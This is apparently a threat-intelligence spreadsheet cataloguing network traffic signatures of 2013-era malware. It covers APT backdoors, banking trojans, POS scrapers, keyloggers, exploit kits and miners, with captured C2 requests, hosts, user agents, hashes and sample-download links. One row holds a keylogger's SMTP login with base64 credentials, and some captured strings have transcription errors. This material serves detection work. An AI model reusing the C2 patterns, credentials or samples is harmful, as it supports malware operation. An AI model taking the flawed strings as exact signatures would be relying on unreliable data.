MALWARE TRAFFIC PATTERNS
 Share
The version of the browser you are using is no longer supported. Please upgrade to a supported browser.Dismiss

 
View only
 
 
Still loading...
ABCDEFGHIJKLMNOPQRSTU
1
See the new version of this table at deependdata.blogspot.com
2
CarberbTypebeebPOST/GET PatternNetwork Traffic PatternPorts (if not 80)NotesKnown UAStrings MD5sDL SampleDL pcap Analysis DateReferences URLsCredit
3
4/30/2013APTbeeb9002..................wx....9002..................wx....9002.......................9002..................wx....9002..................wx....9002........................9002........!............. .....9002..... .............p.....MZ..................@..:...X..'........!..L.!This program cannot be run in DOS mode.D4ED654BCDA42576FDDFE03361608CAA
3de314089db35af9baaeefc598f09b23(doc dropper)
2568615875525003688839cb8950aeae (doc dropper)
http://bit.ly/aptsampleshttp://bit.ly/aptpcaps2013-02http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html
4
4/30/2013APT9002POSTPOST /2d HTTP/1. 1HTTP 189POST /0 HTTP/1..1
HTTP 189POST /1 HTTP/1.1
HTTP 189POST /2 HTTP/1.1
HTTP 189POST /3 HTTP/1.1
HTTP 189POST /4 HTTP/1.1
HTTP 189POST /f HTTP/1.1
HTTP 190POST /10 HTTP/1.1
HTTP 190POST /11 HTTP/1.1

POST /2d HTTP/1. 1
Use-Agent: lynx
Host: ieee.boeing-job.com
Content-Length: 2
Connection: Keep-Alive
Cache-Control: no-cache
AA
lynx
3de314089db35af9baaeefc598f09b23(doc dropper)
2568615875525003688839cb8950aeae (doc dropper)
2013-02http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html
5
5/29/2013CrimeAdware HotbarPOST /vic.aspx?ver=4.0.1158.0&rnd=595937 HTTP/1.1POST /vic.aspx?ver=4.0.1158.0&rnd=595937 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Filename: gUcmpCp
User-Agent: NSIS_Inetc (Mozilla)
Host: b.compqueue.com
Content-Length: 276
Connection: Keep-Alive
Cache-Control: no-cache
epostdata=0c40ff4962816cc3e206edda1108327207ee080103baf1c6bb02c....
User-Agent: NSIS_Inetc (Mozilla)e8022373bc452ab06c49752ce20c5cc2
e7f41ba37a3c57dd31de45f0c1f855a1
d689f23246bd49b01bd30b5926e992ba
2013-05http://threatcenter.crdf.fr/?More&ID=145956&D=CRDF.AdWare.AdWare.Win32.HotBar553635795
6
8/11/2013CrimeAlina POS v5.6POST /duck/push.php HTTP/1.1POST /duck/push.php HTTP/1.1
Accept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v5.6
Host: 208.98.63.226
Content-Length: 82
Cache-Control: no-cache
User-Agent: Alina v5.6http://contagioexchange.blogspot.com/2013/08/alina-pos-v56-strings-crime.html5A22ED78B6454E34217D07C4AF37B23Bhttp://bit.ly/crimesampleshttp://bit.ly/crimepcaps2013-06http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html
7
8/11/2013CrimeAlina POS v5.6POST /adobe/version_check.php HTTP/1.1POST /adobe/version_check.php HTTP/1.1
Accept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v5.3
Host: 91.229.76.97
Content-Length: 2980
Cache-Control: no-cache
User-Agent: Alina v5.3http://contagioexchange.blogspot.com/2013/08/alina-pos-strings-crime.html4c754150639aa3a86ca4d6b6342820behttp://bit.ly/crimesampleshttp://bit.ly/crimepcaps2013-06http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html
8
8/11/2013CrimeAlina POS v6.0POST /adobe/version_check.php HTTP/1.1POST /adobe/version_check.php HTTP/1.1
Accept: application/octet-stream
Content-Type: application/octet-stream
Connection: Close
User-Agent: Alina v6.0
Host: 91.229.76.97
Content-Length: 3349
Cache-Control: no-cache
User-Agent: Alina v6.02013-08http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html
9
4/28/2013CrimeAndromedaPOST /new/gate.php HTTP/1.1POST /new/gate.php HTTP/1.1
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0
Content-Length: 32
Host: seantit.ru

mejRs96VP96+PIRfAjNy+Izj9E8jZscm
Mozilla/4.0http://contagioexchange.blogspot.com/2013/08/andromeda-bot-strings-crime.html85F908A5BD0ADA2D72D138E038AECC7Dhttp://bit.ly/crimesampleshttp://bit.ly/crimepcaps2013-04http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
10
4/28/2013APTAPT1_WEBC2_RAVEGET /comp/sem/resources.htm HTTP/1.1GET /comp/sem/resources.htm HTTP/1.1
User-Agent: HTTP Mozilla/5.0(compatible+MSIE)
Host: www.cometoway.org
Cache-Control: no-cache
The Trojan parses (0x004016D0) the received data for the HTML comment tags:
<!-- [Base64 encoded data] -->
HTTP Mozilla/5.0(compatible+MSIE)http://contagioexchange.blogspot.com/2013/08/webc2-rave-strings-apt.htmla2534e9b7e4146368ea3245381830eb02011-05http://www.cyberengineeringservices.com/analysis-of-file-winsrv-exe/
11
6/6/2013Crime?ArcomRat / DokstormacS_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^]username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption[!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^]S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^]username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption[!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^]
various samples
1866
1888
1865
1890
Crime or APT? Possiibly some MidEast rat; NO...NO...NO... in the traffic; Preceded by GET request for a file with odd extensions like .awe or .avf
User-Agent: MSIE 7.0 for the file GET request
unpacked samples have extensive Unicode strings
62B4C4432361C9B4B69C480C07AFA356
191FDC32304C50D9A054420E59BD21A9
4015DD5B27EB612CA5DC320033E284C5
http://bit.ly/crimesamples2013-05http://www.threatexpert.com/report.aspx?md5=62b4c4432361c9b4b69c480c07afa356
http://www.symantec.com/security_response/writeup.jsp?docid=2012-112912-5237-99&tabid=2
12
6/6/2013Crime?Ardamax keylogger220 smtp.mail.yahoo.com ESMTP ready
EHLO DELLXT
250-smtp.mail.yahoo.com
220 smtp.mail.yahoo.com ESMTP ready
EHLO DELLXT
250-smtp.mail.yahoo.com
250-PIPELINING
250-SIZE 41697280
250-8 BITMIME
250 AUTH PLAIN LOGIN XYMCOOKIE
AUTH LOGIN
334 VXNlcm5hbWU6
bGludXgwNjQwMEB5YWhvby5jb20=
334 UGFzc3dvcmQ6
YXplcnR5LzA2
235 2.0.0 OK
MAIL FROM:
25login in base64E33AF9E602CBB7AC3634C2608150DD18http://bit.ly/crimesampleshttp://bit.ly/crimepcaps2013-05http://www.ardamax.com/keylogger/
13
4/30/2013CrimeAsprox CheckinGET /4213D5182A41F58F3D01D8208B0BE9633A985A4C35C70A97FF61249661F38426DA71D12B40F9A512B6C945CD85462CD565962B6C5CACB1B09F86B1651EB971F3013D14695028FE0BEBD838B9D3C5DE002EA95371E51B0E8CFB7567F6BF HTTP/1 . 1GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C35C70A97FF61249661F38426DA71D12B40F9A512B6C945CD85462CD565962B6C5CACB1B09F86B1651EB971F3013D14695028FE0BEBD838B9D3C5DE002EA95371E51B0E8CFB7567F6BF HTTP/1 . 1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 178.77.103.54:8080
initial “check-in” communication The URL path is RC4 encrypted, the key to which is the first eight characters:
key = “4213D518”
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf
14
4/30/2013CrimeAsproxGET list of C2sGET /4213D5182A41F58F3D01D8208B0BE9633A985A4C35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0 HTTP/1.1GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 178.77.103.54:8080
8080acquire the latest list of
C&C server location
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)2013http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf
15
4/30/2013CrimeAsproxGETs spam templateGET /78dc91f1D56B9COC18B818A7A2B272F43O3A621CAEOC17O479E4E9A69B82 HTTP/1 .1GET /78dc91f1D56B9COC18B818A7A2B272F43O3A621CAEOC17O479E4E9A69B82 HTTP/1 .1
Content-Type: application/x-www-form-urlencoded
Content-Transfer-Encoding: base64
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: 50.22.136.150:8080
Connection: Keep-Alive
8080Other communications look very similar except forr different content type - depending on activity. See the reference. The smtpWorker.dll.crp (smtpWorker.dll) module is downloaded when the C&C server issues the command, c=rdl&u=/get/smtpWorker.dll.crp&a=0&k=9c59ca70&n=. using Kuluoz downloader.GETting spam templateMozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)2013http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf
16
5/1/2013CrimeAvatar RootkitGET /search?query=EZTFDHWP&sort=relevance HTTP/1 .1 http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevanceGET /search?query=EZTFDHWP&sort=relevance HTTP/1 .1
Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLP. 3.0.30729; Media Center PC 6.0)
Host: groups . yahoo. corn
SymFilter(UpperCase(Base64(Encrypt(17BTN1)))) = EZTFDHWP
EZTFDHWP is used for the subsequent search request on Yahoo groups. - see paper for more info
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLP. 3.0.30729; Media Center PC 6.0)Global\{%s}`000000000000000000000000000000002
Global\{%s}`000000000000000000000000000000001
Unicode
\KernelObjects\%SCondition`0000000000000
%suxtheme.dll;%scryptbase.dll
Dropper1 (BTN1 botnet) – b2b3bb4b7c5a050a583246a8abe5a79d723b8b57
Dropper2 (NET1 botnet) – 93473126a9aa13834413c494ae5f62eec1016fde
http://bit.ly/crimesamples2013-05http://www.welivesecurity.com/2013/05/01/mysterious-avatar-rootkit-with-api-sdk-and-yahoo-groups-for-cc-communication/
17
4/28/2013APTbackdoor ?GET /18110123/page_32262 308. html HTTP/1. 1GET /18110123/page_32262 308. html HTTP/1. 1
Accept:
Cookie: XX=0; BX=0
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Host: cuteoverload. dyndns . org
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
Mozilla/4.0 (compatible; MSIE 8.0; Win32)2012-09http://www.fireeye.com/blog/technical/cyber-exploits/2012/09/analysis-of-malware-page.html#more-14
18
4/28/2013APTBanechant 1GET /IGKKT HTTP/1.1GET /iGKKT HTTP/1.1
Accept: 1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0. 50727)
Host: ow.ly
Connection: Keep-Alive . . . .

Error 301, implicitly redirects to malicious site
HTTP/1.1 301 Moved Permanently
Date: Fri, 15 Mar 2013 16:31:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5. 3. 2-1ubuntu4. 18
set-cookie: OWLYSID=f6f604d22494a738706d64353e3536d91c5d69e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate,POST-check=0, pre-check=0
Pragma: n cachc
Location: Ihttp://symbisecure. com/update/winword.pkg
X-Gridnum. T3
Vary: Accept-Encoding
Content-Encodi ng: gzi p
Content-Length: 20
connection: close
Content-Type: text/html
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0. 50727)2013-04http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html
19
4/28/2013APTBanechant payload dl 2GET /adserv/logo.jpg HTTP /1.1GET /adserv/logo.jpg HTTP /1.1
Accept: image/jpeg
User-Agent:Mozilla/4.0 (compatible; MS1E 6.0; Windows NT 5.1; Sv2)
Connection: Keep-Alive
host: . symbisecure.com
Mozilla/4.0 (compatible; MS1E 6.0; Windows NT 5.1; Sv2)2013-04http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html
20
5/2/2013CrimeBeebone downloaderGET /0/?f|-1813912965Admin
GET a/76876332/1
{random}.{domain}:{port}/{number}/{affiliate_id}|{hdserial}{username}
GET /0/?f|-1813912965Admin
GET /1/?b|-2020396961winxp
GET /2/?f|-1396129654Guest
GET /9/?a|-1312965453MyPC
GET /0/?f|-2713912961Developer
GET /0/?b|-5711296542Windows7
GET /1/?a|-1296545361Administrator
GET /0/?f|-1813912965Admin
GET a/76876332/1
GET /a/76876332/bb1
Random
41001
30980
8080
443
always
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
2013-05http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fBeebone#techdetails_link
21
4/28/2013APTBeebusGET /windosdate/v6/defau1t.aspx?ln=en-us HTTP/1 .1GET /windowsupdate/v6/defau1t.aspx?ln=en-us HTTP/1 .1
User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: update.microsoft.com
Cookie: WC1=V=3&GUID=afe1e295d3c94b2ca137abc405a63a57
Beebus initialGET requestMozilla/4.0 (compatible; )2013-02http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html
22
4/28/2013APTBeebus C2 checkinGET /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 HTTP/1.1GET /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: 68.96.31.136
Beebus C2 checkin Mozilla/4.0 (compatible; )http://contagioexchange.blogspot.com/2013/08/beebus-warp-strings-apt.htmld7ec457be3fad8057580e07cae74becb2011-09http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html
23
4/28/2013APTBeebus C2 checkinGET /s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 HTTP/1.1GET /s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host: bee.businessconsults.net
Beebus C2 checkin Mozilla/4.0 (compatible; )http://contagioexchange.blogspot.com/2013/08/beebus-warp-strings-apt.html7ed557921ac60dfcb295ebabfd9723012011-04http://www.fireeye.com/blog/technical/targeted-attack/2013/02/operation-beebus.html
24
4/28/2013APTBeebus data sendPOST /s/asp?__uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVwBJAE4ARABPAFcAUwBNAEEAQQBOAEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==p=2 HTTP/1.1POST /s/asp?__uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVwBJAE4ARABPAFcAUwBNAEEAQQBOAEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==p=2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Accept: /
Host:
Content-Length: 563
Connection: Keep-Alive
Cache-Control: no-cache
Beebus data sendhttp://contagioexchange.blogspot.com/2013/08/beebus-warp-strings-apt.html
25
5/12/2013CrimeBitcoinminerPOST / HTTP/1.1
Authorization: Basic cXdlcnR5MTIzLjE6eA==
POST / HTTP/1.1
Authorization: Basic cXdlcnR5MTIzLjE6eA==
Host: www2.x3x4.su:666
Accept-Encoding: deflate, gzip
Content-Type: application/json
Content-Length: 45
User-Agent: cpuminer 2.2.3
X-Mining-Extensions: midstate

{"method": "getwork", "params": [], "id":0}
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 12 May 2013 22:56:11 GMT
Content-Type: application/json
Content-Length: 635
Connection: keep-alive

{"result": {"data": "000000017343cad1ae316260d1f2c262cc391443453a09fd8c8630e3bce86c47b3e476b73eaf9a0cf5eb36e74577ff3cb29f9267f5f300f252235ba77f47a9ea7aba6dba51901e351b6dcb6a00000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000080020000", "hash1": "00000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000010000", "midstate": "b1313289534677d23f93a6447a02047a09c369962cd1029393f5a2063368dcf2", "algorithm": "scrypt:1024,1,1", "target": "ffffffffffffffffffffffffffffffffffffffffffffffffffffffff07000000"}, "id": 0, "error": null}
666User-Agent: cpuminer 2.2.312E717293715939C5196E604591A97DFhttp://bit.ly/crimesampleshttp://bit.ly/crimepcaps2013-05
26
8/8/2012CRIMEBitcoinMiner {"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]}{"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]}
{"error": null, "id": 1, "result": [["mining.notify", "ae6812eb4cd7735a302a8a9dd95cf71f"], "f80e8a14", 4]}
{"params": [63], "id": null, "method": "mining.set_difficulty"}
{"params": ["8de", "72216db0a2e9151d8b8172470729848cbeecf1080cb8f37f65d047efb2c749f3", "01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2303122606062f503253482f04a5c4035208", "092f7374726174756d2f000000000100fb422a010000001976a9143c5adb00f1457309f084675941f114b8c09b6af188ac00000000", ["fc25ce83ea8ce3200ed2f56e7cf1ec43a8837118ddd965759c8fbe4d12a04f82", "ee78512684f4bb06bcbed1aa01703e10bbb733dc16cccaf387df0b18f656f234"], "00000001", "1b4e2a39", "5203c4a4", true], "id": null, "method": "mining.notify"}
{"id": 2, "method": "mining.authorize", "params": ["hitmanuk.4", "123"]}
9000downloaded by Bitblazer . Part of a tool package including bat file with "system.exe --algo scrypt --s 6 --threads 4 --url stratum+tcp://mine.pool-x.eu:9000 --userpass hitmanuk.4:123
P
none in request but file strings:
User-Agent: suckergo/2.3.2
http://contagioexchange.blogspot.com/2013/08/bitcoinminer-strings-crime.htmle2c655db1ccd3a632ded94eacb933643 = part of f865c199024105a2ffdf5fa98f391d74 dropper - downloaded by Blazebot DBAF6F1D0EAAB5DC0C88B9CEEC9EA95Ehttp://bit.ly/crimesampleshttp://bit.ly/crimepcaps8/8/2012http://lavasoft.com/mylavasoft/malware-descriptions/blog/blazebot
27
4/28/2013Crime EKBlackhole 2GET /fded177fe12651bb038f3f11b01c4168/q.php HTTP/1.1GET /fded177fe12651bb038f3f11b01c4168/q.php HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Referer: http://www.jobs-located-near.com/Lanoka%20Harbor/NJ/08734/Internship/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: 193.93.248.227
Connection: Keep-Alive
compromised site - malwertizing on www.jobs-located-near.com redirect to BH landing page via iframevictim UA2013-04http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_blackhole-exploit-kit.pdf
http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
28
5/29/2013CrimeBlackhole v2GET /7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a=1f&zg=c&tn=g&jopa=1658622 HTTP/1.1GET /7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a=1f&zg=c&tn=g&jopa=1658622 HTTP/1.1
User-Agent: Java/1.7.0_10
Host: bandirmacatiemlak.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
an attempt is made to exploit a known vulnerability in jdk.User-Agent: Java/1.7.0_102013-05
29
8/8/2012CRIMEBlazebotNICK USA|94576
USER vtptdwd 0 0 :USA|94576
NICK USA|94576
USER vtptdwd 0 0 :USA|94576
:DIE.Blazed-IRC.com NOTICE AUTH :*** Looking up your hostname...
:DIE.Blazed-IRC.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:DIE.Blazed-IRC.com NOTICE USA|94576 :*** If you are having problems connecting due to ping timeouts, please type /quote pong 5FC26DC1 or /raw pong 5FC26DC1 now.
PING :5FC26DC1
PONG :5FC26DC1
JOIN #fkyou# stay0ut
:DIE.Blazed-IRC.com 001 USA|94576 :Welcome to the Blazed-IRC IRC Network USA|94576!vtptdwd@[victimIp]
6667IRChttp://bit.ly/crimesamples8/8/2012http://lavasoft.com/mylavasoft/malware-descriptions/blog/blazebot
30
4/30/2013CrimeCarberpPOST /kmqkcicalxrntrngwdxjyxztxcqkoyjnbdoafqirgnwwvpcjqglucovna.phtm POST /kmqkcicalxrntrngwdxjyxztxcqkoyjnbdoafqirgnwwvpcjqglucovna.phtm HTTP/1.1
Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: caaarrp2.ru
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
content of the form like this:

kfq=u%2FFPG1eImmXBEb3mG5VomEqE9ivVw2uh550qE1K2LoqWfJkbTeN%3D
where ‘kfq’ is a randomly generated string which is concatenated with the equality sign and an encoded message
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)2012-03http://blog.avast.com/2013/04/08/carberp_epitaph/
31
11/12/2013CRIMEChePro (Brazil.banker)GET /ini/xvwmmwb.mod HTTP/1.1GET /ini/xvwmmwb.mod HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.aspramece.com.br
Connection: Keep-Alive
embedded in RTFUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)http://contagioexchange.blogspot.com/2013/11/brazilian-bamker-cinternetbankingcpl.html2A5E5D3C536DA346849750A4B8C8613A (RTF dropper)
6D78F17AC2E4B95A671B079F25DD3B79 (RTF dropper)
http://bit.ly/crimesampleshttp://bit.ly/crimepcaps11/12/2013http://www.securelist.com/en/blog/208214122/Brazilian_bankers_gone_wild_now_using_malicious_Office_files
32
8/21/2013CrimeChimerka.1 / Refyes.APOST /sys.php HTTP/1.0POST /sys.php HTTP/1.0
Host: rxform.org
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6
Referer: http://www.gmail.com
Content-length: 112
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6http://contagioexchange.blogspot.com/2013/08/refeysa-strings-crime.htmlbede0da1abc1122acf8af91f6d6b289fhttp://bit.ly/crimesamples2013-08http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:Win32/Refeys.A#tab=2
33
4/28/2013CrimeCitadelPOST /g.php HTTP/1.1POST /g.php HTTP/1.1
Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Host: nologo0091.org
Content-Length: 122
Connection: Keep-Alive
Cache-Control: no-cache
......y.....m.....x.).600Y.J.z......Yy.<(X.T..... .....A.w....a.....}(R.........T...-:.N..>..........qqm.n.......\.<.X@>..
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-crime-2.html http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-crime-1.htmlhttp://bit.ly/crimesampleshttp://bit.ly/crimepcaps2012-05http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
34
4/28/2013CrimeCitadel (Zbot var)POST /C270suqdh/file.php HTTP/1.1POST /C270suqdh/file.php HTTP/1.1
Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: vivaspace2013.com
Content-Length: 122
Connection: Keep-Alive
Cache-Control: no-cache

..Cx.oB...3.Yc>........8|....M.........8...E.a4.!.A...A+.z.Q...,\.\<\.#.$?.........@;...C'J-jL...R....)3.HP....eu.......
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-crime-2.html http://contagioexchange.blogspot.com/2013/08/citadel-1351-strings-crime-1.html3D6046E1218FB525805E5D8FDC605361http://bit.ly/crimesampleshttp://bit.ly/crimepcaps4/26/2013http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html
35
5/1/2013APTComfoo / Vinself / MspubGET /BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/12AzAONjkCYw/UD1aND43a0xiWQ161/ HTTP/1.1GET /BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/12AzAONjkCYw/UD1aND43a0xiWQ161/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, /
Accept-Language: en-en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)
Host: mail.lthreebox.com
Cache-Control: no-cache
Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)5. Disk Information!
4. Account Information!
3. System Time!
2. CPU Type!

Unicode
RDOMAIN
RNAME
69bb7612b2e6a0f647b3e9c93b0bf572 DA52D94C1F5D46F5C1F73D60DA04C53Chttp://bit.ly/aptsamples4/7/2011http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf
36
4/28/2013APTCookies /Cookiebag / DalbotGET /1799.asp HTTP/1.1GET /1799.asp HTTP/1.1
Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: usnftc.org
Connection: Keep-Alive
Cookie: CAQGBgoFD1YaHA4ZH1AIBwIOBR8ADhJWWV5bX1ADBBgfBQoGDlYmKic8KjkuIz4lPy45UA==

'command=qwert;clientkey=2504;hostname=MALWAREHUNTER;'
Decoded string is shown in Figure 8, where the decoded string includes the command request, the clientkey (which is a decimal value selected at program startup), and the compromised host’s name. Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html0C28AD34F90950BC784339EC9F50D288http://bit.ly/aptpcaps2012-08http://intelreport.mandiant.com/
37
4/28/2013APTCookies /Cookiebag / DalbotGET /3961.html HTTP/1.1
Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtleT0zOTU0O2hvc3RuYW1lPXZpY3RpbTs=

GET /3961.html HTTP/1.1
Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtleT0zOTU0O2hvc3RuYW1lPXZpY3RpbTs=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
.NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022;
.NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 216.62.168.251:8080
Connection: Keep-Alive
8080Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-2.html http://contagioexchange.blogspot.com/2013/08/cookies-cookiebag-dalbot-strings-apt-1.html2c4cabb4ca19ddf87c7f11bad44bdf05http://bit.ly/aptpcaps2011-09http://www.cyberengineeringservices.com/trojan-cookies/
38
